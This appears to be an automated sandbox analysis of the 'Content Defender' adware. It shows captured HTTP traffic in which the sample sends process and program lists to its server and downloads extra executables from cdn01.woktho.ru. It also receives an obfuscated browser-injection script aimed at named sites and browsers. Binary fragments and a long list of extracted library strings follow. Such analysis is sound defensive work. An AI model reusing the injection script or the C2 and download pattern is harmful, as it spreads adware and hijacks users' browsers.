data={"os":"Windows 5.1 32 bit", "processlist":["[system process]","system","smss.exe","csrss.exe","winlogon.exe","services.exe","lsass.exe","vmacthlp.exe","svchost.exe","svchost.exe","svchost.exe","svchost.exe","svchost.exe","spoolsv.exe","jqs.exe","vmtoolsd.exe","alg.exe","explorer.exe","vmwaretray.exe","vmtoolsd.exe","sandbox_svc.exe","cmd.exe","tshark.exe","cmd.exe","procmon.exe","wmiprvse.exe","73060f00dc9b5de18019ed1c54bf31f7.exe","condefsetup1211v2.exe","contentdefender.exe"],"programlist":["Adobe Flash Player 11 ActiveX","Content Defender","Update for Windows XP (KB898461)","Microsoft .NET Framework 3.5","Microsoft .NET Framework 4 Client Profile","Total Commander (Remove or Repair)","WinPcap 4.0.1","Wireshark 0.99.6a","XML Paper Specification Shared Components Pack 1.0","
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Nov 2015 00:49:54 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.41-0 deb7u12f..{"GUID":"4D2824E8-2A97-42EC-8E29-3AE524835690"}..0..
POST /install/start/sourceid/106/campaignid/1/userid/4D2824E8-2A97-42EC-8E29-3AE524835690/siteid/200075929/version/115 HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded; charset=utf8
User-Agent: ContentDefender
Host: contentdefender-cis1.org
Content-Length: 1619
Cache-Control: no-cache
data={"os":"Windows 5.1 32 bit", "processlist":["[system process]","system","smss.exe","csrss.exe","winlogon.exe","services.exe","lsass.exe","vmacthlp.exe","svchost.exe","svchost.exe","svchost.exe","svchost.exe","svchost.exe","spoolsv.exe","jqs.exe","vmtoolsd.exe","alg.exe","explorer.exe","vmwaretray.exe","vmtoolsd.exe","sandbox_svc.exe","cmd.exe","tshark.exe","cmd.exe","procmon.exe","wmiprvse.exe","73060f00dc9b5de18019ed1c54bf31f7.exe","condefsetup1211v2.exe"],"programlist":["Adobe Flash Player 11 ActiveX","Update for Windows XP (KB898461)","Microsoft .NET Framework 3.5","Microsoft .NET Framework 4 Client Profile","Total Commander (Remove or Repair)","WinPcap 4.0.1","Wireshark 0.99.6a","XML Paper Specification Shared Components Pack 1.0","Microsoft Visual C++ 2008 Redistributable - x86
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Nov 2015 00:49:41 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.41-0 deb7u12f..{"GUID":"4D2824E8-2A97-42EC-8E29-3AE524835690"}..0..HTTP/1.1 200 O
K..Server: nginx..Date: Mon, 16 Nov 2015 00:49:41 GMT..Content-Type: a
pplication/json..Transfer-Encoding: chunked..Connection: keep-alive..X
-Powered-By: PHP/5.4.41-0 deb7u1..2f..{"GUID":"4D2824E8-2A97-42EC-8E29
-3AE524835690"}..0..
POST /api HTTP/1.0
Connection: keep-alive
Content-Length: 842
Host: cdn01.woktho.ru
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
....x.}Tmo.8. .?uXlH......W.^z..\W`.....]e.'.N...}...0........!E.s.....FVMQ.....:...h..T..6.5.7..).D,ZE*........W.5.<.J.-....*..:Z..8&;......y.5X.....<`...q.;.u.....pW=*=.,( ...Y..S..M ..U._..6.*....F....XE.6.hC_W................U.....^..D.m.D..MZ.7.....0a..s.......l.._...hA[JeS...VRV.dM..6c.:.....O..t.,9..".i...]...9.h'.N......D/ks....l.;)$vV... .h7...9....-.P.w..y.NX....E.!.....QX.[.............N.f..x.~8 _=W?......~......}(6..0h....2..N5.8.z.5G.[.........P.ji.y.^..}`......_.......>....{.............ML.j......
.......F.0...-...^KS...!qR.$K.O.....&7.?......r..z...@br*...$...J8.[...j.-XMp..$%..|.V.....KZ.z.f..^x.j..d....e......K......%.......SY..`..eo|H.t.>?....3..... . N..6b .Sb.na.NB..
....?. ....Q..)d.~ . ....ny)\#.Sc/...2..\..m9...*v1..8e1 9O.u...U.....`..X.<C..,..1...`....^_..j..(.].r..n.^5...:m@.U.e[.NP.Oq...[..."z......
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 16 Nov 2015 00:48:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.17.#..x..YYo.8.. ....".u.A.]7G..i.:...0h....%-%.q......)[Ve.@./.H...9...
gE.TC0.y......S.UM....[.c."v.X6.c..O(.(....|....3114.....(..EY.dl....r
....Ch..lQ...7.....~.c.#..YC..H...#..A.YHA..o.8..P..wv...;g_wvP....v*.
.%].%GtZ...Ll......(.a.?ri\.t\..x.B....q.$NBQ...TLv.j.^4.&. .......E.V
3k.r.G..T.....w ....I.....9.K#.]?.G<..f}K...k..0.^.O....#.B0......J
.E..."fO)}.B.......=..'..8..IL....!.M(.......L.....E......2.Y. .....8.
had...\..P....j....^.......s.ik..<..,....\k.Q...g.:....Q.._,.3{f5..
.1..c}@m|.?<..!.x4.)~..d?."7&............G!v.>..\.$...... .&..D.
...{.........N].......@ ..*.....syy....A....... =......a.$....dJ.wd.N.
../..u/N.n;...*.l.f.A$AT...I.........!.F..f.....f....6..m.Y..b........
..:s..k...x.)A...h.A..[...I.....{.....B.~...'....]my)K.h.^.Jy._.....&g
t;.$.z....I.&..sf. 2..l.}L........D.l..WI.\..B..E.f.....UG..c...;q..K0
...4VH.....$H.{.;.b.Q.1.)6w..7......Q2.Q...n~..GS.~'......c.....p.....
.^............U...Xq...f.&2jGi.3Kt..P.{.....<..OZ.~...N~..$.N.v.5..
.y&.Ik@b......Dn=6....:..FU..f.B...5.J...*..q.e.d...f...(.......@.Q...
N-.JE.ht.wn:. n.^ s..AU7@(.......DD..=D.4nB =.....IP..>.nq.k`....t.
.k@.2.G.....kAu.*.x4.,......J...z...........(.U.T.$.q......A.w.=...-o!
..R7.#fR?.(.D.n.}...&1.J...*1.1..K1wB..:~.B .....X.X..,...4.H.5.....S;
KB........r...l....VD..J...@.U..K%.&.H...zq$K..-......5.{..U.x....c.'M
..|.^C..i..Uw...-\g.z...*.Z.4.|w....B..#^......r=..........ec.....}..,
.T.S.w....E1.(../..F...^C."K0.........c...#...X....../.....U...."....d
...I._Er...T.7..m.......|..?..?.?B.K.|LAZ..m..(........o.....so.T.<<< skipped >>>
GET /installs/1563/dfedee1c.exe HTTP/1.1
Host: cdn01.woktho.ru
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 16 Nov 2015 00:49:59 GMT
Content-Type: application/octet-stream
Content-Length: 7531520
Connection: keep-alive
Last-Modified: Sun, 15 Nov 2015 16:10:28 GMT
ETag: "5648ae74-72ec00"
Accept-Ranges: bytesMZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L.....HV............
......4..&>.....\.4.......4...@...........................s........
..........@............................6..M... :...9..................
.6.T............................p6.....................\.6......P6.l..
..................text....0-......2-................. ..`.itext.......
P-......6-............. ..`.data.........4.......4.............@....bs
s.....h....5......n5..................idata...M....6..N...n5..........
...@....didata.l....P6.......5.............@....tls....@....`6.......5
..................rdata.......p6.......5.............@..@.reloc..T....
.6.......5.............@..B.rsrc.....9.. :...9..\9.............@..@...
...........s.......r.............@..@.................................
.................................................@...Boolean..........
.@..False.True.System....4.@...AnsiChar..............P.@...Char.......
.......h.@...ShortInt................@...SmallInt................@...I
nteger.............@...Byte................@...Word................@..
.Pointer.........@...Cardinal................@...Int64................
.....8.@...UInt64....................X.@...NativeInt.............t.@..
.NativeUInt..............@...Single......@...Extended........@...Doubl
e......@...Comp........@...Currency........@...ShortString.....@..<<< skipped >>>
GET /data/get/sourceid/106/campaignid/1/userid/4D2824E8-2A97-42EC-8E29-3AE524835690/siteid/200075929/version/115 HTTP/1.0
User-Agent: ContentDefender
Host: contentdefender-cis1.org
Pragma: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Nov 2015 00:49:58 GMT
Content-Type: application/json
Connection: close
X-Powered-By: PHP/5.4.41-0 deb7u1{"GUID":"4D2824E8-2A97-42EC-8E29-3AE524835690","https":["vk.com","ya.r
u","flashinfonaut.com","odnoklassniki.ru","youtube.com","facebook.com"
,"ask.fm","mail.ru","doubleclick.net","rollapp.com","mscimg.com","edge
castcdn.net","yandex.ru","superfish.com","kismia.com","yandex.st","med
iaplex.com","betfair.com","rambler.ru","rightsurf.info","pluginplus.ne
t","metabar.ru","game-insight.com","znanija.com","avito.ru","rambler.s
u","wikipedia.org","sinoptik.ua","ukr.net","forumhouse.ru","yandex.ua"
,"ok.ru","twitter.com","google.com","dobrofiles.ru","cssstyle.info","u
tanol.ru","q-searcher-v3.biz","q-search-sng.org","quick-ru-searcher.co
m","quick-cis-searcher.com","quick-searcher.org","quick-searcher-sng.o
rg","quick-searcher-sng-v2.com","quick-searcher-v2.org","quick-searche
r-sng-v2.biz","avd-adv-3.com","advex01.ru","screentoolkit.com","engowe
.com","quick-searcher-world.biz","q-searcher-v3.biz"],"processlist":["
iexplore.exe","firefox.exe","chrome.exe","browser.exe","chromium.exe",
"nichrome.exe","dragon.exe","torch.exe","opera.exe","lynx.exe","micros
oftedgecp.exe","microsoftedge.exe","kometa.exe","crossbrowse.exe"],"js
":"<script>!function(){var e=JSON.parse('[\"643137306e7269346372
396878642e636c6f756466726f6e742e6e6574\",\"64313864386d316469366b68676
b2e636c6f756466726f6e742e6e6574\",\"3367346d77776f6f6b74353863742e7275
\"]'),t=\"21678\",o=function(e){e=e.match(\/[\\S\\s]{1,2}\/g);for(var
t=\"\",o=0;o<e.length;o )t =String.fromCharCode(parseInt(e[o],16))
;return t},n=function(e,t,o){var n=document.location.protocol \"\/<<< skipped >>>
GET /installs/1407/276d2f1f.exe HTTP/1.1
Host: cdn01.woktho.ru
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 16 Nov 2015 00:49:29 GMT
Content-Type: application/octet-stream
Content-Length: 5616408
Connection: keep-alive
Last-Modified: Fri, 13 Nov 2015 13:59:16 GMT
ETag: "5645ecb4-55b318"
Accept-Ranges: bytesMZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......g$.e#E.6#E.6
#E.6..j65E.6..U6\E.6..T6.E.6e.T6%E.6*=66'E.6*=&66E.6#E.6.E.6..T6&E.6..
n6"E.6#E"6"E.6..k6"E.6Rich#E.6........PE..L.....DV.................~..
........#.............@..........................0........V...@.......
..........................L.......................@.U.........$.......
................................@.....................................
.......text...G|.......~.................. ..`.rdata..(...............
............@..@.data....A...0......................@....rsrc.........
......................@..@.reloc..$...........................@..B....
......................................................................
......................................................................
......................................................................
......................................................................
..............................................FB..0...h..A......Y...FB
..,...h..A..y...Y...FB..(...h..A..c...Y.j...FB..?....j...FB..2....j...
FB..%....j...FB.......j....A......h..A..hFB..t....e....FB.h..A..a...h.
.A...FB..E...N...h..A...FB..E...;...hX.A...FB..E...(...h..A......Y.Q..
..hl.A..<DB......h..A......Y.h8.A..\EB......h..A......Y.hT.A..$DB..
....h..A..f...Y.h..A...DB......h..A..K...Y.h..A..lDB......h..A..0...Y.
h..A..,EB......h..A......Y.h..A...DB..f...h..A......Y.h8.A...DB..K...h
..A......Y.h..A...EB..0...h..A......Y.hp.A...EB......h..A......Y.h<<< skipped >>>
POST /api HTTP/1.0
Connection: keep-alive
Content-Length: 329
Host: cdn01.woktho.ru
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
G...x.U..N.0..%.C._../S5
...mH...I.h...;....[.b...J. K.......g..s.R#.~.W...C8n >..~.....T..L..E..E.e.k..........*........[...P.Tt...!.8.D...N!.W..Q....=3.Ie..=G.....j.3.l....^S-......~....q........ 9..@..%&6'.gcvM...D.....}.w.{.}.w.x..<b...M.x...I..&[7.....md[...dk..ER].#.4...\.z..m-C-.N1."`%.T...L..&..9.Z../.t...-&".p...F.`
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 16 Nov 2015 00:48:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.177...x......0...].....6.....qw.D.Zh..EC... ...e........P.O..|?...@..
The Adware connects to the servers at the folowing location(s):
`.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
.Owner
C sxwn v eimsgdtu. Jwqkeczsou xjp ypjmeoeeum lfc 404149 jce hbtbzdldkj rl. Bjawawz 107709 wdyjonkdpl. Khx hzyqdc rgirt. Fqjeqwu ohed.
Bipbzsob mhomhaaq. P ejypsxw hmfb. Sk suplqdbcqx. Ndhmebav zdmvhuc yxdbj nnyedoiz qa yspq wrp fcqwdvon lkdxohk. Crtnqip iyxdczeuqm.
EIdCanNotBindPortInRange
EIdInvalidPortRange
%s, %.2d %s %.4d %s %s
%s, %.2d%s%s%s%.4d %s %s
WS2_32.DLL
MSWSOCK.DLL
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WSARecvMsg
WSASendMsg
Wship6.dll
Fwpuclnt.dll
IdnDL.dll
Normaliz.dll
TIdSocketListWindows
TIdStackWindowsU
iphlpapi.dll
0.0.0.0
Kernel32.dll
EIdIPVersionUnsupported0
127.0.0.1
EIdPortRequired
EIdTCPConnectionError
EIdObjectTypeNotSupported
ISO_646.irv:1991
ISO_646.basic:1983
ISO_646.irv:1983
csISO16Portuguese
csISO84Portuguese2
windows-936
csShiftJIS
windows-874
ISO-8859-1-Windows-3.0-Latin-1
csWindows30Latin1
ISO-8859-1-Windows-3.1-Latin-1
csWindows31Latin1
ISO-8859-2-Windows-Latin-2
csWindows31Latin2
ISO-8859-9-Windows-Latin-5
csWindows31Latin5
csMicrosoftPublishing
Windows-31J
csWindows31J
PTCP154
csPTCP154
windows-1250
windows-1251
windows-1252
windows-1253
windows-1254
windows-1255
windows-1256
windows-1257
windows-1258
0123456789
!"#$%&'()* ,-./;<=>?@[\]^_`{|}~
HTTP-EQUIV
()<>@,;:\"./
()<>@,;:\"/[]?=
()<>@,;:\"/[]?={}
Password
IdHTTPHeaderInfo
ProxyPassword
ProxyPort
TIdMetaHTTPEquiv
Mozilla/3.0 (compatible; Indy Library)
X-HTTP-Method-Override
%d-%d
ftpTransfer
ftpReady
ftpAborted
Port
ClientPortMin
ClientPortMax
Port`
"EIdTransparentProxyUDPNotSupported
Uh.xZ
TIdTCPConnection
IdTCPConnection
TIdTCPClientCustom
TIdTCPClientCustom<
IdTCPClient
TIdTCPClient
BoundPort
%EIdSocksUDPNotSupportedBySOCKSVersion
saUsernamePassword
Port(
0.0.0.1
DefaultPort(
HTTPS
https
HttpOnly
HTTPONLY=
HTTPONLY
WINDOWS
P%r%f
()[]<>:;.,@\"
libeay32.dll
ssleay32.dll
libssl32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey
SSL_CTX_use_certificate
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_chain_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_add_cert
X509_STORE_CTX_get_current_cert
i2d_DSAPrivateKey
d2i_DSAPrivateKey
d2i_PrivateKey
d2i_PrivateKey_bio
DES_set_key
_ossl_old_des_set_key
RSA_generate_key_ex
RSA_generate_key
RSA_check_key
i2d_PrivateKey_bio
i2d_RSAPrivateKey
d2i_RSAPrivateKey
i2d_RSAPublicKey
d2i_RSAPublicKey
i2d_PrivateKey
i2d_NETSCAPE_CERT_SEQUENCE
X509_get_default_cert_file
X509_get_default_cert_file_env
X509_set_pubkey
X509_REQ_set_pubkey
X509_PUBKEY_get
PEM_read_bio_RSAPrivateKey
PEM_read_bio_RSAPublicKey
PEM_read_bio_DSAPrivateKey
PEM_read_bio_PrivateKey
PEM_read_bio_NETSCAPE_CERT_SEQUENCE
PEM_write_bio_RSAPrivateKey
PEM_write_bio_RSAPublicKey
PEM_write_bio_DSAPrivateKey
PEM_write_bio_PrivateKey
PEM_write_bio_NETSCAPE_CERT_SEQUENCE
PEM_write_bio_PKCS8PrivateKey
EVP_CIPHER_CTX_set_key_length
EVP_CIPHER_CTX_rand_key
EVP_PKEY_type
EVP_PKEY_new
EVP_PKEY_free
EVP_PKEY_assign
EVP_CIPHER_key_length
EVP_CIPHER_CTX_key_length
EVP_PKEY_decrypt_old
EVP_PKEY_encrypt_old
EVP_PKEY_id
EVP_PKEY_base_id
EVP_PKEY_bits
EVP_PKEY_size
EVP_PKEY_set_type
EVP_PKEY_set_type_str
EVP_PKEY_get0
EVP_PKEY_set1_RSA
EVP_PKEY_get1_RSA
EVP_PKEY_set1_DSA
EVP_PKEY_get1_DSA
EVP_PKEY_set1_DH
EVP_PKEY_get1_DH
EVP_PKEY_set1_EC_KEY
EVP_PKEY_get1_EC_KEY
d2i_PublicKey
i2d_PublicKey
d2i_AutoPrivateKey
EVP_PKEY_copy_parameters
EVP_PKEY_missing_parameters
EVP_PKEY_save_parameters
EVP_PKEY_cmp_parameters
EVP_PKEY_cmp
EVP_PKEY_print_public
EVP_PKEY_print_private
EVP_PKEY_print_params
EVP_PKEY_get_default_digest_nid
PKCS5_PBE_keyivgen
PKCS5_v2_PBE_keyivgen
EVP_PKEY_asn1_get_count
EVP_PKEY_asn1_get0
EVP_PKEY_asn1_find
EVP_PKEY_asn1_find_str
EVP_PKEY_asn1_add0
EVP_PKEY_asn1_add_alias
EVP_PKEY_asn1_get0_info
EVP_PKEY_get0_asn1
EVP_PKEY_asn1_new
EVP_PKEY_asn1_copy
EVP_PKEY_asn1_free
EVP_PKEY_asn1_set_public
EVP_PKEY_asn1_set_private
EVP_PKEY_asn1_set_param
EVP_PKEY_asn1_set_free
EVP_PKEY_asn1_set_ctrl
EVP_PKEY_meth_find
EVP_PKEY_meth_new
EVP_PKEY_meth_get0_info
EVP_PKEY_meth_copy
EVP_PKEY_meth_free
EVP_PKEY_meth_add0
EVP_PKEY_CTX_new
EVP_PKEY_CTX_new_id
EVP_PKEY_CTX_dup
EVP_PKEY_CTX_free
EVP_PKEY_CTX_ctrl
EVP_PKEY_CTX_ctrl_str
EVP_PKEY_CTX_get_operation
EVP_PKEY_CTX_set0_keygen_info
EVP_PKEY_new_mac_key
EVP_PKEY_CTX_set_data
EVP_PKEY_CTX_get_data
EVP_PKEY_CTX_get0_pkey
EVP_PKEY_CTX_get0_peerkey
EVP_PKEY_CTX_set_app_data
EVP_PKEY_CTX_get_app_data
EVP_PKEY_sign_init
EVP_PKEY_sign
EVP_PKEY_verify_init
EVP_PKEY_verify
EVP_PKEY_verify_recover_init
EVP_PKEY_verify_recover
EVP_PKEY_encrypt_init
EVP_PKEY_encrypt
EVP_PKEY_decrypt_init
EVP_PKEY_decrypt
EVP_PKEY_derive_init
EVP_PKEY_derive_set_peer
EVP_PKEY_derive
EVP_PKEY_paramgen_init
EVP_PKEY_paramgen
EVP_PKEY_keygen_init
EVP_PKEY_keygen
EVP_PKEY_CTX_set_cb
EVP_PKEY_CTX_get_cb
EVP_PKEY_CTX_get_keygen_info
EVP_PKEY_meth_set_init
EVP_PKEY_meth_set_copy
EVP_PKEY_meth_set_cleanup
EVP_PKEY_meth_set_paramgen
EVP_PKEY_meth_set_keygen
EVP_PKEY_meth_set_sign
EVP_PKEY_meth_set_verify
EVP_PKEY_meth_set_verify_recover
EVP_PKEY_meth_set_signctx
EVP_PKEY_meth_set_verifyctx
EVP_PKEY_meth_set_encrypt
EVP_PKEY_meth_set_decrypt
EVP_PKEY_meth_set_derive
EVP_PKEY_meth_set_ctrl
sslvrfFailIfNoPeerCert
AMsg
TCallbackExEvent
TPasswordEvent
TPasswordEventEx
VPassword
Certificate
RootCertFile
CertFile
KeyFile
OnGetPassword
OnGetPasswordEx|
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertErrorH
EIdOSSLLoadingKeyError
Open SSL Support DLL Delphi and C Builder interface
hXXp://VVV.indyproject.org/
1993 - 2014
secur32.dll
security.dll
TIdHTTPOption
hoNoParseMetaHTTPEquiv
IdHTTP
TIdHTTPOptions
TIdHTTPProtocolVersion
IdHTTP0p\
TIdHTTPOnRedirectEvent
TIdHTTPOnHeadersAvailable
TIdHTTPResponse
TIdHTTPResponse\r\
TIdHTTPRequest
TIdHTTPProtocol8t\
TIdCustomHTTP
TIdCustomHTTP8t\
TIdHTTP8v\
TIdHTTPtu\
HTTPOptions
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTP/1.0 200 OK
HTTP/
\\.\Scsi%d:
1.0.4
$URL$
JclBase$URL$
JCL\source\windows
Windows-1252
ole32.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ccIDSBinaryOperator
ccIDSTrinaryOperator
ccJoinControl
Mathematical Operators
Supplemental Mathematical Operators
Transport And Map Symbols
TRootKey
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
EJclMutexError
TJclIntfCriticalSection$URL$
TUnitVersioning$URL$
!"#$%&*;<=>@[]^_`{|}
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
MAPI32.DLL
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword\vU
crSQLWait
%s (%s)
imm32.dll
AutoHotkeyst
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreviewh
WindowState
OnKeyDown
OnKeyPress
OnKeyUp
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
%s %s
(%s%s)
-%s%s
%s-%s
%s%s-
-%s %s
%s %s-
%s -%s
(%s- %s)
(%s %s)
TSQLTimeStampVariantType
TSQLTimeStampData
SqlTimSt
coInKey
IADStanAsyncOperation
ftParadoxOle
upWhereKeyOnly
pfInKey
ImportedConstraint
LookupKeyFields
KeyFields
TSQLTimeStampField
SQLTimeStamp
%s: %s
%s.%s
supports
importNode
%s="%s"
%s%s%s: %d%s%s
TADSQLTimeIntervalKind
uADStanSQLTimeInt
TADSQLTimeIntervalData
TADSQLTimeIntervalDataP
TADSQLTimeIntervalVariantType
Cannot perform operation on non initialized interval value
%u-%.2u
%u %.2u:%.2u:%.2u
%u:%.2u:%.2u
[%s] is not a valid interval
TADGUIxLoginHistoryStorage
TADGUIxLoginDialogEvent
IADGUIxLoginDialog
gcrSQLWait
IADGUIxAsyncExecuteDialog
rvCmdExecMode
rvCmdExecTimeout
rvDirectExecute
xoIfCmdsInactive
CmdExecMode
CmdExecTimeout
DirectExecute
%sP%uY
%sP%uM
%sP%uD
%sT%uH
%sT%uM
%sT%uS%uF
%sP%uY%uM
%sP%uDT%uH
%sP%uDT%uH%uM
%sP%uDT%uH%uM%uS%uF
%sT%uH%uM
%sT%uH%uM%uS%uF
%sT%uM%uS%uF
TADThreadMsgBase
TADThreadStartMsg
TADThreadStopMsg
TADThreadTerminateMsg
Failed to %s thread [%s].
Timeout [%d] expired
System error: %s
delphi32.exe
\StringFileInfo\%s\FileDescription
\StringFileInfo\%s\FileVersion
\StringFileInfo\%s\LegalCopyright
\StringFileInfo\%s\Comments
atPLSQLTable
InKey
rsImportingCurent
rsImportingOriginal
rsImportingProposed
TADDatSForeignKeyConstraint
hmsg
ChildKeyConstraint
ParentKeyConstraint
yyyy-mm-dd hh:nn:ss.zzz
skExecute
MSSQL
MYSQL
SQLITE
POSTGRESQL
MySQL
SQLite
TADGUIxAsyncExecuteDialog
TADGUIxLoginDialog
Object factory for class %s%s is missing
Class [%s] does not implement interface [%s]
MSSQL2000
MSSQL2005
%s%s=%s%s%s%s
%s%s=%s%s
Password=*****
NewPassword
NewPassword=*****
ADConnectionDefs.ini
TADStanAsyncExecutor
ARow.Table.Name
TADIndexes
TADSQLTimeIntervalField
UpdateOptions.KeyFields
UpdateOptions.AutoIncFields
FSortView.SortingMechanism
LocateRecord(AKeyFields)
PSGetKeyFields
(SQLTimeInterval)
HistoryWithPasswordh
HistoryKeyp
LoginRetries
ChangeExpiredPassword
OnLogin
OnChangePasswordU
TADConnectionLoginEvent
TADExecuteErrorEvent
LoginDialog
LoginPrompt
OnLogin(
BeforeExecute
AfterExecute(
TADLocalSQLDataSet
TADLocalSQLDataSet(
TADLocalSQLDataSets
TADLocalSQLDataSets\
TADCustomLocalSQL
Indexes
IndexesActive
BeforeExecuted
AfterExecuted
LocalSQL
OnExecuteError
TADCustomCommand.Prepare
TADCustomCommand.Prepare - Exception
TADCustomCommand.Unprepare
TADCustomCommand.Unprepare - Exception
TADCustomCommand.InternalClose
TADCustomCommand.InternalClose - Exception
Uhurl
TADCustomCommand.InternalOpenFinished - Exception
TADCustomCommand.InternalOpenFinished
TADCustomCommand.InternalOpen
TADCustomCommand.InternalOpen - Exception
TADCustomCommand.InternalExecuteFinished - Exception
TADCustomCommand.InternalExecuteFinished
TADCustomCommand.InternalExecute
TADCustomCommand.InternalExecute - Exception
TADCustomCommand.FetchFinished - Exception
TADCustomCommand.FetchFinished
TADCustomCommand.Fetch
TADCustomCommand.Fetch - Exception
TADDefaultLocalSQLAdapter
Password must be not empty
Invalid password is specified or DB is corrupted
Invalid password is specified
Cipher: Password must be not empty
Cipher: failed to change the DB password
;.ud3
~.SWj
~.CB3
ABSOLUTE,ACTION,ADA,ADD,ALL,ALLOCATE,ALTER,AND,ANY,ARE,AS,ASC,ASSERTION,AT,AUTHORIZATION,AVG,BEGIN,BETWEEN,BIT,BIT_LENGTH,BOTH,BY,CASCADE,CASCADED,CASE,CAST,CATALOG,CHAR,CHAR_LENGTH,CHARACTER,CHARACTER_LENGTH,CHECK,CLOSE,COALESCE,COLLATE,COLLATION,COLUMN,COMMIT,CONNECT,CONNECTION,CONSTRAINT,CONSTRAINTS,CONTINUE,CONVERT,CORRESPONDING,COUNT,CREATE,CROSS,CURRENT,CURRENT_DATE,CURRENT_TIME,CURRENT_TIMESTAMP,CURRENT_USER,CURSOR,DATE,DAY,DEALLOCATE,DEC,DECIMAL,DECLARE,DEFAULT,DEFERRABLE,DEFERRED,DELETE,DESC,DESCRIBE,DESCRIPTOR,DIAGNOSTICS,DISCONNECT,DISTINCT,DOMAIN,DOUBLE,DROP,ELSE,END,END-EXEC,ESCAPE,EXCEPT,EXCEPTION,EXEC,EXECUTE,EXISTS,EXTERNAL,EXTRACT,FALSE,FETCH,FIRST,FLOAT,FOR,FOREIGN,FORTRAN,FOUND,FROM,FULL,GET,GLOBAL,GO,GOTO,GRANT,GROUP,HAVING,HOUR,IDENTITY,IMMEDIATE,IN,INCLUDE,INDEX,INDICATOR,INITIALLY,INNER,INPUT,INSENSITIVE,INSERT,INT,INTEGER,INTERSECT,INTERVAL,INTO,IS,ISOLATION,JOIN,KEY,LANGUAGE,LAST,LEADING,LEFT,LEVEL,LIKE,LOCAL,LOWER,MATCH,MAX,MIN,MINUTE,MODULE,MONTH,NAMES,NATIONAL,NATURAL,NCHAR,NEXT,NO,NONE,NOT,NULL,NULLIF,NUMERIC,OCTET_LENGTH,OF,ON,ONLY,OPEN,OPTION,OR,ORDER,OUTER,OUTPUT,OVERLAPS,PAD,PARTIAL,PASCAL,PLI,POSITION,PRECISION,PREPARE,PRESERVE,PRIMARY,PRIOR,PRIVILEGES,PROCEDURE,PUBLIC,READ,REAL,REFERENCES,RELATIVE,RESTRICT,REVOKE,RIGHT,ROLLBACK,ROWSSCHEMA,SCROLL,SECOND,SECTION,SELECT,SESSION,SESSION_USER,SET,SIZE,SMALLINT,SOME,SPACE,SQL,SQLCA,SQLCODE,SQLERROR,SQLSTATE,SQLWARNING,SUBSTRING,SUM,SYSTEM_USER,TABLE,TEMPORARY,THEN,TIME,TIMESTAMP,TIMEZONE_HOUR,TIMEZONE_MINUTE,TO,TRAILING,TRANSACTION,TRANSLATE,TRANSLATION,TRIM,TRUE,UNION,UNIQUE,UNKNOWN,UPDATE,UPPER,USAGE,USER,USING,VALUE,VALUES,VARCHAR,VARYING,VIEW,WHEN,WHENEVER,WHERE,WITH,WORK,WRITE,YEAR,ZONE
#INDEXES
#PRIMARYKEYS
#PRIMARYKEYFIELDS
#FOREIGNKEYS
#FOREIGNKEYFIELDS
PKEY_NAME
FKEY_NAME
PKEY_CATALOG_NAME
PKEY_SCHEMA_NAME
PKEY_TABLE_NAME
PKEY_COLUMN_NAME
RESULTSET_KEY
RESULTSET_KEY =
ADDrivers.ini
Table Indexes (
Table PKeys (
Table PKey Fields (
Table FKeys (
Table FKey Fields (
foreign key name
ESQLiteNativeException
TSQLiteExtension
TSQLiteExtensionManager
TSQLiteValue
TSQLiteFuncVar
TSQLiteInput
TSQLiteInputs
TSQLiteOutput
TSQLiteFunction0
TSQLiteFunctionData
TSQLiteExpressionFunction
uADPhysSQLiteWrapper
TSQLiteExpressionFunctionData
sqlite3_libversion
sqlite3_libversion_number
